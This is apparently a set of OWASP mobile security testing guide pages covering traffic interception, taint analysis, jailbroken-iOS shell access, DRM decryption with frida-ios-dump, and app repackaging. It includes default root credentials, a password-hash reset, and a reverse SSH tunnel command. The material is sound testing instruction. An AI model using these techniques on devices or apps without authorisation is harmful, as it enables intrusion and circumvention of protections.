[0x7d1c49954c]> pdf\n ;-- sym.fun.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI:\n\u256d (fcn) fcn.7d1c49954c 18\n\u2502 fcn.7d1c49954c (int32_t arg_40f942h);\n\u2502 ; arg int32_t arg_40f942h @ x29+0x40f942\n\u2502 0x7d1c49954c 080040f9 ldr x8, [x0]\n\u2502 0x7d1c499550 01000090 adrp x1, 0x7d1c499000\n\u2502 0x7d1c499554 21801591 add x1, x1, 0x560 ; hit0_4\n\u2502 0x7d1c499558 029d42f9 ldr x2, [x8, 0x538] ; [0x538:4]=-1 ; 1336\n\u2502 0x7d1c49955c 4000 invalid\n
Note that the line tagged with ; hit0_4
corresponds to the string that we've previously found: 0x7d1c499560 hit0_4 Hello from C++
.
To learn more, please refer to the r2frida wiki.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0100/","title":"Logging Sensitive Data from Network Traffic","text":"mitmproxy can be used to intercept network traffic from Android apps. This technique is useful for identifying sensitive data that is sent over the network, as well as for identifying potential security vulnerabilities.
Once with mitmproxy installed and your device configured to use it, you can create a python script to filter the traffic and extract the sensitive data. For example, the following script will extract all the data sent in the requests and responses only if the data is considered sensitive. For this example we consider sensitive data to be any data that contains the strings \"dummyPassword\" or \"sampleUser\", so we include them in the SENSITIVE_STRINGS
list.
# mitm_sensitive_logger.py\n\nfrom mitmproxy import http\n\n# This data would come from another file and should be defined after identifying the data that is considered sensitive for this application.\n# For example by using the Google Play Store Data Safety section.\nSENSITIVE_DATA = {\n \"precise_location_latitude\": \"37.7749\",\n \"precise_location_longitude\": \"-122.4194\",\n \"name\": \"John Doe\",\n \"email_address\": \"john.doe@example.com\",\n \"phone_number\": \"+11234567890\",\n \"credit_card_number\": \"1234 5678 9012 3456\"\n}\n\nSENSITIVE_STRINGS = SENSITIVE_DATA.values()\n\ndef contains_sensitive_data(string):\n return any(sensitive in string for sensitive in SENSITIVE_STRINGS)\n\ndef process_flow(flow):\n url = flow.request.pretty_url\n request_headers = flow.request.headers\n request_body = flow.request.text\n response_headers = flow.response.headers if flow.response else \"No response\"\n response_body = flow.response.text if flow.response else \"No response\"\n\n if (contains_sensitive_data(url) or \n contains_sensitive_data(request_body) or \n contains_sensitive_data(response_body)):\n with open(\"sensitive_data.log\", \"a\") as file:\n if flow.response:\n file.write(f\"RESPONSE URL: {url}\\n\")\n file.write(f\"Response Headers: {response_headers}\\n\")\n file.write(f\"Response Body: {response_body}\\n\\n\")\n else:\n file.write(f\"REQUEST URL: {url}\\n\")\n file.write(f\"Request Headers: {request_headers}\\n\")\n file.write(f\"Request Body: {request_body}\\n\\n\")\ndef request(flow: http.HTTPFlow):\n process_flow(flow)\n\ndef response(flow: http.HTTPFlow):\n process_flow(flow)\n
Now you can run mitmproxy with the script:
mitmdump -s mitm_sensitive_logger.py\n
Our example app has this code:
fun testPostRequest() {\n val thread = Thread {\n try {\n val url = URL(\"https://httpbin.org/post\")\n val httpURLConnection = url.openConnection() as HttpURLConnection\n httpURLConnection.requestMethod = \"POST\"\n httpURLConnection.doOutput = true\n httpURLConnection.setRequestProperty(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n val user = \"sampleUser\"\n val password = \"dummyPassword\"\n\n val postData = \"username=$user&password=$password\"\n\n val outputStream = BufferedOutputStream(httpURLConnection.outputStream)\n val bufferedWriter = BufferedWriter(OutputStreamWriter(outputStream, \"UTF-8\"))\n bufferedWriter.write(postData)\n bufferedWriter.flush()\n bufferedWriter.close()\n outputStream.close()\n\n val responseCode = httpURLConnection.responseCode\n if (responseCode == HttpURLConnection.HTTP_OK) {\n Log.d(\"HTTP_SUCCESS\", \"Successfully authenticated.\")\n } else {\n Log.e(\"HTTP_ERROR\", \"Failed to authenticate. Response code: $responseCode\")\n }\n\n } catch (e: Exception) {\n e.printStackTrace()\n }\n }\n thread.start()\n}\n
The app sends a POST request to https://httpbin.org/post
with the body username=sampleUser&password=dummyPassword
. httpbin.org
is a website that returns the request data in the response body, so we can see the data that was sent in the request.
Run the app and use it as you normally would. The script will log any sensitive data that is sent over the network to the sensitive_data.log
file.
Example console output:
[10:07:59.348] Loading script mitm_sensitive_logger.py\n[10:07:59.351] HTTP(S) proxy listening at *:8080.\n[10:08:08.188][127.0.0.1:64701] server connect httpbin.org:443 (52.206.94.89:443)\n[10:08:08.192][127.0.0.1:64709] server connect mas.owasp.org:443 (104.22.27.77:443)\n[10:08:08.245][127.0.0.1:64709] Client TLS handshake failed. The client does not trust the proxy's certificate for mas.owasp.org (OpenSSL Error([('SSL routines', '', 'ssl/tls alert certificate unknown')]))\n[10:08:08.246][127.0.0.1:64709] client disconnect\n[10:08:08.246][127.0.0.1:64709] server disconnect mas.owasp.org:443 (104.22.27.77:443)\n127.0.0.1:64701: POST https://httpbin.org/post\n << 200 OK 548b\n
Example sensitive_data.log
output:
REQUEST URL: https://httpbin.org/post\nRequest Headers: Headers[(b'Content-Type', b'application/x-www-form-urlencoded'), (b'User-Agent', b'Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)'), (b'Host', b'httpbin.org'), (b'Connection', b'Keep-Alive'), (b'Accept-Encoding', b'gzip'), (b'Content-Length', b'42')]\nRequest Body: username=sampleUser&password=dummyPassword\n\nRESPONSE URL: https://httpbin.org/post\nResponse Headers: Headers[(b'Date', b'Tue, 16 Jan 2024 09:08:08 GMT'), (b'Content-Type', b'application/json'), (b'Content-Length', b'548'), (b'Connection', b'keep-alive'), (b'Server', b'gunicorn/19.9.0'), (b'Access-Control-Allow-Origin', b'*'), (b'Access-Control-Allow-Credentials', b'true')]\nResponse Body: {\n \"args\": {}, \n \"data\": \"\", \n \"files\": {}, \n \"form\": {\n \"password\": \"dummyPassword\", \n \"username\": \"sampleUser\"\n }, \n \"headers\": {\n \"Accept-Encoding\": \"gzip\", \n \"Content-Length\": \"42\", \n \"Content-Type\": \"application/x-www-form-urlencoded\", \n \"Host\": \"httpbin.org\", \n \"User-Agent\": \"Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)\", \n \"X-Amzn-Trace-Id\": \"Root=1-65a64778-78495e9f5d742c9b0c7a75d8\"\n }, \n \"json\": null, \n \"origin\": \"148.141.65.87\", \n \"url\": \"https://httpbin.org/post\"\n}\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0108/","title":"Taint Analysis","text":"Taint analysis is an information flow analysis technique that tracks the flow of sensitive information within a program. For example, it can determine whether geolocation data collected in an Android app is being transmitted to third-party domains.
In taint analysis, data flows from a \"source\" to a \"sink\". A source is where sensitive information originates, and a sink is where this information is ultimately utilized. For instance, we can determine if the device ID retrieved by a getDeviceId()
function is transmitted as a text message via another function sendTextMessage()
. In this scenario, getDeviceId()
is the source, and sendTextMessage()
is the sink. If a direct path exists between them, it's called a leak.
In large applications, manual information flow analysis can be very time consuming and inaccurate. Taint analysis automates this, with two main methods: static and dynamic. The former examines code without running it, offering broad coverage but potentially yielding false positives. In contrast, dynamic analysis observes real-time application execution, providing actual context but possibly overlooking untriggered issues. A thorough comparison of these techniques is beyond this section's scope.
There are multiple tools which perform taint analysis on native code, including Triton and bincat. However, in this section, we'll primarily focus on Android Java code and utilize FlowDroid for the taint analysis. Another notable tool supporting taint analysis for Android apps is GDA.
For our demonstration, we'll use the FlowDroid command line tool to perform taint analysis on the InsecureShop v1.0 application.
The InsecureShop app accepts a username and password as input and stores them in the app's shared preferences. In our taint analysis, we're interested in how this stored username and password are used. In this context, the username and password are the sensitive information, and reading from shared preferences is the source. The sink in this analysis could be various operations, such as sending info over the network, transmitting info via an Intent
, or storing info in an external file.
To use FlowDroid, firstly, we need to provide an input list of potential sources and sinks to evaluate for. In our case, reading from shared preferences will be the source, while adding parameters to an Intent
will be the sink. The configuration file will look as follows (we'll name it \"source_sink.txt\"):
<android.content.SharedPreferences: java.lang.String getString(java.lang.String, java.lang.String)> -> _SOURCE_\n\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.CharSequence)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,char)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)> -> _SINK_\n
To invoke FlowDroid via the command line, use the following command:
java -jar soot-infoflow-cmd/target/soot-infoflow-cmd-jar-with-dependencies.jar \\\n -a InsecureShop.apk \\\n -p Android/Sdk/platforms \\\n -s source_sink.txt\n\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"password\", $r5) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"password\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getPassword()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"username\", $r4) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"username\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getUsername()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication - Found 2 leaks\n
The output also uses the jimple intermediate representation and reveals two leaks in the application, each corresponding to the username and password. Given that the InsecureShop app is open-source, we can refer to its source code to validate the findings, as shown below:
// file: AboutActivity.kt\n\nfun onSendData(view: View) {\n val userName = Prefs.username!!\n val password = Prefs.password!!\n\n val intent = Intent(\"com.insecureshop.action.BROADCAST\")\n intent.putExtra(\"username\", userName)\n intent.putExtra(\"password\", password)\n sendBroadcast(intent)\n\n textView.text = \"InsecureShop is an intentionally designed vulnerable android app built in Kotlin.\"\n\n }\n
Taint analysis is especially beneficial for automating data flow analysis in intricate applications. However, given the complexity of some apps, the accuracy of such tools can vary. Thus, it's essential for reviewers to find a balance between the accuracy of tools and the time spent on manual analysis.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0047/","title":"Reverse Engineering","text":"Reverse engineering is the process of taking an app apart to find out how it works. You can do this by examining the compiled app (static analysis), observing the app during runtime (dynamic analysis), or a combination of both.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0048/","title":"Static Analysis","text":"For white-box source code testing, you'll need a setup similar to the developer's setup, including a test environment that includes the Android SDK and an IDE. Access to either a physical device or an emulator (for debugging the app) is recommended.
During black-box testing, you won't have access to the original form of the source code. You'll usually have the application package in Android's APK format, which can be installed on an Android device or reverse engineered as explained in the section \"Disassembling and Decompiling\".
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/","title":"Dynamic Analysis","text":"Dynamic Analysis tests the mobile app by executing and running the app binary and analyzing its workflows for vulnerabilities. For example, vulnerabilities regarding data storage might be sometimes hard to catch during static analysis, but in dynamic analysis you can easily spot what information is stored persistently and if the information is protected properly. Besides this, dynamic analysis allows the tester to properly identify:
Analysis can be assisted by automated tools, such as MobSF, while assessing an application. An application can be assessed by side-loading it, re-packaging it, or by simply attacking the installed version.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/#basic-information-gathering","title":"Basic Information Gathering","text":"As mentioned previously, Android runs on top of a modified Linux kernel and retains the proc filesystem (procfs) from Linux, which is mounted at /proc
. Procfs provides a directory-based view of a process running on the system, providing detailed information about the process itself, its threads, and other system-wide diagnostics. Procfs is arguably one of the most important filesystems on Android, where many OS native tools depend on it as their source of information.
Many command line tools are not shipped with the Android firmware to reduce the size, but can be easily installed on a rooted device using BusyBox. We can also create our own custom scripts using commands like cut
, grep
, sort
etc, to parse the proc filesystem information.
In this section, we will be using information from procfs directly or indirectly to gather information about a running process.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0050/","title":"Binary Analysis","text":"Binary analysis frameworks give you powerful ways to automate tasks that would be almost impossible to do manually. Binary analysis frameworks typically use a technique called symbolic execution, which allow to determine the conditions necessary to reach a specific target. It translates the program's semantics into a logical formula in which some variables are represented by symbols with specific constraints. By resolving the constraints, you can find the conditions necessary for the execution of some branch of the program.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0051/","title":"Tampering and Runtime Instrumentation","text":"First, we'll look at some simple ways to modify and instrument mobile apps. Tampering means making patches or runtime changes to the app to affect its behavior. For example, you may want to deactivate SSL pinning or binary protections that hinder the testing process. Runtime Instrumentation encompasses adding hooks and runtime patches to observe the app's behavior. In mobile application security however, the term loosely refers to all kinds of runtime manipulation, including overriding methods to change behavior.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/","title":"Accessing the Device Shell","text":"One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the iOS shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#remote-shell","title":"Remote Shell","text":"In contrast to Android where you can easily access the device shell using the adb tool, on iOS you only have the option to access the remote shell via SSH. This also means that your iOS device must be jailbroken in order to connect to its shell from your host computer. For this section we assume that you've properly jailbroken your device and have either Cydia (see screenshot below) or Sileo installed. In the rest of the guide we will reference to Cydia, but the same packages should be available in Sileo.
In order to enable SSH access to your iOS device you can install the OpenSSH package. Once installed, be sure to connect both devices to the same Wi-Fi network and take a note of the device IP address, which you can find in the Settings -> Wi-Fi menu and tapping once on the info icon of the network you're connected to.
You can now access the remote device's shell by running ssh root@<device_ip_address>
, which will log you in as the root user:
$ ssh root@192.168.197.234\nroot@192.168.197.234's password:\niPhone:~ root#\n
Press Control + D or type exit
to quit.
When accessing your iOS device via SSH consider the following:
root
and mobile
.alpine
.Remember to change the default password for both users root
and mobile
as anyone on the same network can find the IP address of your device and connect via the well-known default password, which will give them root access to your device.
If you forget your password and want to reset it to the default alpine
:
/private/etc/master.password
on your jailbroken iOS device (using an on-device shell as shown below) root:xxxxxxxxx:0:0::0:0:System Administrator:/var/root:/bin/sh\n mobile:xxxxxxxxx:501:501::0:0:Mobile User:/var/mobile:/bin/sh\n
xxxxxxxxx
to /smx7MYTQIi2M
(which is the hashed password alpine
)During a real black box test, a reliable Wi-Fi connection may not be available. In this situation, you can use usbmuxd to connect to your device's SSH server via USB.
Connect macOS to an iOS device by installing and starting iproxy:
$ brew install libimobiledevice\n$ iproxy 2222 22\nwaiting for connection\n
The above command maps port 22
on the iOS device to port 2222
on localhost. You can also make iproxy run automatically in the background if you don't want to run the binary every time you want to SSH over USB.
With the following command in a new terminal window, you can connect to the device:
$ ssh -p 2222 root@localhost\nroot@localhost's password:\niPhone:~ root#\n
Small note on USB of an iDevice: on an iOS device you cannot make data connections anymore after 1 hour of being in a locked state, unless you unlock it again due to the USB Restricted Mode, which was introduced with iOS 11.4.1
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#on-device-shell-app","title":"On-device Shell App","text":"While usually using an on-device shell (terminal emulator) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or check some configuration. For example, you can install NewTerm 2 via Cydia for this purpose (it supports iOS 6.0 to 12.1.2 at the time of this writing).
In addition, there are a few jailbreaks that explicitly disable incoming SSH for security reasons. In those cases, it is very convenient to have an on-device shell app, which you can use to first SSH out of the device with a reverse shell, and then connect from your host computer to it.
Opening a reverse shell over SSH can be done by running the command ssh -R <remote_port>:localhost:22 <username>@<host_computer_ip>
.
On the on-device shell app run the following command and, when asked, enter the password of the mstg
user of the host computer:
ssh -R 2222:localhost:22 mstg@192.168.197.235\n
On your host computer run the following command and, when asked, enter the password of the root
user of the iOS device:
ssh -p 2222 root@localhost\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/","title":"Host-Device Data Transfer","text":"There might be various scenarios where you might need to transfer data from the iOS device or app data sandbox to your host computer or vice versa. The following section will show you different ways on how to achieve that.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#copying-app-data-files-via-ssh-and-scp","title":"Copying App Data Files via SSH and SCP","text":"As we know now, files from our app are stored in the Data directory. You can now simply archive the Data directory with tar
and pull it from the device with scp
:
iPhone:~ root# tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\niPhone:~ root# exit\n$ scp -P 2222 root@localhost:/tmp/data.tgz .\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#grapefruit","title":"Grapefruit","text":"After starting Grapefruit you can select the app that is in scope for testing. There are various functions available, of which one is called \"Finder\". When selecting it, you will get a listing of the directories of the app sandbox.
When navigating through the directories and selecting a file, a pop-up will show up and display the data either as hexadecimal or text. When closing this pop-up you have various options available for the file, including:
When you are starting objection you will find the prompt within the Bundle directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # pwd print\nCurrent directory: /var/containers/Bundle/Application/DABF849D-493E-464C-B66B-B8B6C53A4E76/org.owasp.MSTG.app\n
Use the env
command to get the directories of the app and navigate to the Documents directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n/var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n
With the command file download <filename>
you can download a file from the iOS device to your host computer and can analyze it afterwards.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # file download .com.apple.mobile_container_manager.metadata.plist\nDownloading /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\n
You can also upload files to the iOS device with file upload <local_file_path>
.
During development, apps are sometimes provided to testers via over-the-air (OTA) distribution. In that situation, you'll receive an itms-services link, such as the following:
itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\n
You can use the ITMS services asset downloader tool to download the IPA from an OTA distribution URL. Install it via npm:
npm install -g itms-services\n
Save the IPA file locally with the following command:
# itms-services -u \"itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\" -o - > out.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#extracting-the-app-binary","title":"Extracting the App Binary","text":"If you have an IPA with a decrypted app binary, unzip it and you are ready to go. The app binary is located in the main bundle directory (.app), e.g. Payload/Telegram X.app/Telegram X
. See the following subsection for details on the extraction of the property lists.
On macOS's Finder, .app directories are opened by right-clicking them and selecting \"Show Package Content\". On the terminal you can just cd
into them.
IMPORTANT NOTE: In the United States, the Digital Millennium Copyright Act 17 U.S.C. 1201, or DMCA, makes it illegal and actionable to circumvent certain types of DRM. However, the DMCA also provides exemptions, such as for certain kinds of security research. A qualified attorney can help you determine if your research qualifies under the DMCA exemptions. (Source: Corellium)
If you don't have the original IPA, then you need a jailbroken device where you will install the app (e.g. via App Store). Once installed, you need to extract the app binary from memory and rebuild the IPA file. Because of DRM, the app binary file is encrypted when it is stored on the iOS device, so simply pulling it from the Bundle (either through SSH or Objection) will not be sufficient to reverse engineer it.
You can verify this by running this command on the app binary:
otool -l Payload/Telegram X.app/Telegram X | grep -i LC_ENCRYPTION -B1 -A4\nLoad command 12\n cmd LC_ENCRYPTION_INFO\n cmdsize 20\n cryptoff 16384\n cryptsize 32768\n cryptid 1\n
Or with radare2:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto true\n
In order to retrieve the unencrypted version, you can use frida-ios-dump. It will extract the unencrypted version from memory while the application is running on the device.
First, configure Frida-ios-dump dump.py
:
localhost
with port 2222
when using iproxy, or to the actual IP address and port of the device from which you want to dump the binary.User = 'root'
) and password (Password = 'alpine'
) in dump.py
to the ones you have set.Enumerate the apps installed on the device by running python dump.py -l
:
PID Name Identifier\n---- --------------- -------------------------------------\n 860 Cydia com.saurik.Cydia\n1130 Settings com.apple.Preferences\n 685 Mail com.apple.mobilemail\n 834 Telegram ph.telegra.Telegraph\n - Stocks com.apple.stocks\n ...\n
You can dump the selected app, for example Telegram, by running python dump.py ph.telegra.Telegraph
After a couple of seconds, the Telegram.ipa
file will be created in your current directory. You can validate the success of the dump by removing the app and reinstalling it (e.g. using ios-deploy ios-deploy -b Telegram.ipa
). Note that this will only work on jailbroken devices, as otherwise the signature won't be valid.
You can verify that the app binary is now unencrypted:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto false\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#thinning-the-app-binary","title":"Thinning the App Binary","text":"The app binary may contain multiple architectures, such as armv7
(32-bit) and arm64
(64-bit). That is called a \"fat binary\".
One example is the Damn Vulnerable iOS App DVIA v1 to demonstrate this.
Unzip the app and run otool:
unzip DamnVulnerableiOSApp.ipa\ncd Payload/DamnVulnerableIOSApp.app\notool -hv DamnVulnerableIOSApp\n
The output will look like this:
DamnVulnerableIOSApp (architecture armv7):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 33 3684 NOUNDEFS DYLDLINK TWOLEVEL PIE\nDamnVulnerableIOSApp (architecture arm64):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 33 4192 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
To ease the app analysis, it's recommended create a so-called thin binary, which contains one architecture only:
lipo -thin armv7 DamnVulnerableIOSApp -output DVIA32\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0055/","title":"Repackaging Apps","text":"If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer with macOS to perform all the steps indicated in the article \"Patching iOS Applications\" from the objection Wiki. Once you're done you'll be able to patch an IPA by calling the objection command:
objection patchipa --source my-app.ipa --codesign-signature 0C2E8200Dxxxx\n
Finally, the app needs to be installed (sideloaded) and run with debugging communication enabled. Perform the steps from the article \"Running Patched iOS Applications\" from the objection Wiki (using ios-deploy).
ios-deploy --bundle Payload/my-app.app -W -d\n
Refer to \"Installing Apps\" to learn about other installation methods. Some of them doesn't require you to have a macOS.
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"iOS Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/","title":"Installing Apps","text":"When you install an application without using Apple's App Store, this is called sideloading. There are various ways of sideloading which are described below. On the iOS device, the actual installation process is then handled by the installd daemon, which will unpack and install the application. To integrate app services or be installed on an iOS device, all applications must be signed with a certificate issued by Apple. This means that the application can be installed only after successful code signature verification. On a jailbroken phone, however, you can circumvent this security feature with AppSync, a package available in the Cydia store. It contains numerous useful applications that leverage jailbreak-provided root privileges to execute advanced functionality. AppSync is a tweak that patches installd, allowing the installation of fake-signed IPA packages.
Different methods exist for installing an IPA package onto an iOS device, which are described in detail below.
Please note that iTunes is no longer available in macOS Catalina. If you are using an older version of macOS, iTunes is still available but since iTunes 12.7 it is not possible to install apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#cydia-impactor","title":"Cydia Impactor","text":"Cydia Impactor was originally created to jailbreak iPhones, but has been rewritten to sign and install IPA packages to iOS devices via sideloading (and even APK files to Android devices). Cydia Impactor is available for Windows, macOS and Linux. A step by step guide and troubleshooting steps are available on yalujailbreak.net.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#libimobiledevice","title":"libimobiledevice","text":"On Linux and also macOS, you can alternatively use libimobiledevice, a cross-platform software protocol library and a set of tools for native communication with iOS devices. This allows you to install apps over a USB connection by executing ideviceinstaller. The connection is implemented with the USB multiplexing daemon usbmuxd, which provides a TCP tunnel over USB.
The package for libimobiledevice will be available in your Linux package manager. On macOS you can install libimobiledevice via brew:
brew install libimobiledevice\nbrew install ideviceinstaller\n
After the installation you have several new command line tools available, such as ideviceinfo
, ideviceinstaller
or idevicedebug
.
# The following command will show detailed information about the iOS device connected via USB.\n$ ideviceinfo\n# The following command will install the IPA to your iOS device.\n$ ideviceinstaller -i iGoat-Swift_v1.0-frida-codesigned.ipa\n...\nInstall: Complete\n# The following command will start the app in debug mode, by providing the bundle name. The bundle name can be found in the previous command after \"Installing\".\n$ idevicedebug -d run OWASP.iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ipainstaller","title":"ipainstaller","text":"The IPA can also be directly installed on the iOS device via the command line with ipainstaller. After copying the file over to the device, for example via scp, you can execute ipainstaller with the IPA's filename:
ipainstaller App_name.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ios-deploy","title":"ios-deploy","text":"On macOS you can also use the ios-deploy tool to install iOS apps from the command line. You'll need to unzip your IPA since ios-deploy uses the app bundles to install apps.
unzip Name.ipa\nios-deploy --bundle 'Payload/Name.app' -W -d -v\n
After the app is installed on the iOS device, you can simply start it by adding the -m
flag which will directly start debugging without installing the app again.
ios-deploy --bundle 'Payload/Name.app' -W -d -v -m\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#xcode","title":"Xcode","text":"It is also possible to use the Xcode IDE to install iOS apps by doing the following steps:
Sometimes an application can require to be used on an iPad device. If you only have iPhone or iPod touch devices then you can force the application to accept to be installed and used on these kinds of devices. You can do this by changing the value of the property UIDeviceFamily to the value 1 in the Info.plist file.
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\n <key>UIDeviceFamily</key>\n <array>\n <integer>1</integer>\n </array>\n\n</dict>\n</plist> \n
It is important to note that changing this value will break the original signature of the IPA file so you need to re-sign the IPA, after the update, in order to install it on a device on which the signature validation has not been disabled.
This bypass might not work if the application requires capabilities that are specific to modern iPads while your iPhone or iPod is a bit older.
Possible values for the property UIDeviceFamily can be found in the Apple Developer documentation.
One fundamental step when analyzing apps is information gathering. This can be done by inspecting the app package on your host computer or remotely by accessing the app data on the device. You'll find more advance techniques in the subsequent chapters but, for now, we will focus on the basics: getting a list of all installed apps, exploring the app package and accessing the app data directories on the device itself. This should give you a bit of context about what the app is all about without even having to reverse engineer it or perform more advanced analysis. We will be answering questions such as:
When targeting apps that are installed on the device, you'll first have to figure out the correct bundle identifier of the application you want to analyze. You can use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n---- ------------------- -----------------------------------------\n6847 Calendar com.apple.mobilecal\n6815 Mail com.apple.mobilemail\n - App Store com.apple.AppStore\n - Apple Store com.apple.store.Jolly\n - Calculator com.apple.calculator\n - Camera com.apple.camera\n - iGoat-Swift OWASP.iGoat-Swift\n
It also shows which of them are currently running. Take a note of the \"Identifier\" (bundle identifier) and the PID if any as you'll need them afterwards.
You can also directly open Grapefruit and after selecting your iOS device you'll get the list of installed apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the IPA as explained in Basic Testing Operations - Obtaining and Extracting Apps.
You can unzip the IPA using the standard unzip
or any other ZIP utility. Inside you'll find a Payload
folder containing the so-called Application Bundle (.app). The following is an example in the following output, note that it was truncated for better readability and overview:
$ ls -1 Payload/iGoat-Swift.app\nrutger.html\nmansi.html\nsplash.html\nabout.html\n\nLICENSE.txt\nSentinel.txt\nREADME.txt\n\nURLSchemeAttackExerciseVC.nib\nCutAndPasteExerciseVC.nib\nRandomKeyGenerationExerciseVC.nib\nKeychainExerciseVC.nib\nCoreData.momd\narchived-expanded-entitlements.xcent\nSVProgressHUD.bundle\n\nBase.lproj\nAssets.car\nPkgInfo\n_CodeSignature\nAppIcon60x60@3x.png\n\nFrameworks\n\nembedded.mobileprovision\n\nCredentials.plist\nAssets.plist\nInfo.plist\n\niGoat-Swift\n
The most relevant items are:
Info.plist
contains configuration information for the application, such as its bundle ID, version number, and display name._CodeSignature/
contains a plist file with a signature over all files in the bundle.Frameworks/
contains the app native libraries as .dylib or .framework files.PlugIns/
may contain app extensions as .appex files (not present in the example).*.nib
files (storing the user interfaces of iOS app), localized content (<language>.lproj
), text files, audio files, etc.The information property list or Info.plist
(named by convention) is the main source of information for an iOS app. It consists of a structured file containing key-value pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are expected to have an Info.plist
file. You can find all possible keys in the Apple Developer Documentation.
The file might be formatted in XML or binary (bplist). You can convert it to XML format with one simple command:
plutil
, which is a tool that comes natively with macOS 10.2 and above versions (no official online documentation is currently available):plutil -convert xml1 Info.plist\n
apt install libplist-utils\nplistutil -i Info.plist -o Info_xml.plist\n
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Info.plist
file by just inspecting the file or by using grep -i <keyword> Info.plist
:
UsageDescription
(see \"iOS Platform APIs\")CFBundleURLTypes
(see \"iOS Platform APIs\")UTExportedTypeDeclarations
/ UTImportedTypeDeclarations
(see \"iOS Platform APIs\")NSAppTransportSecurity
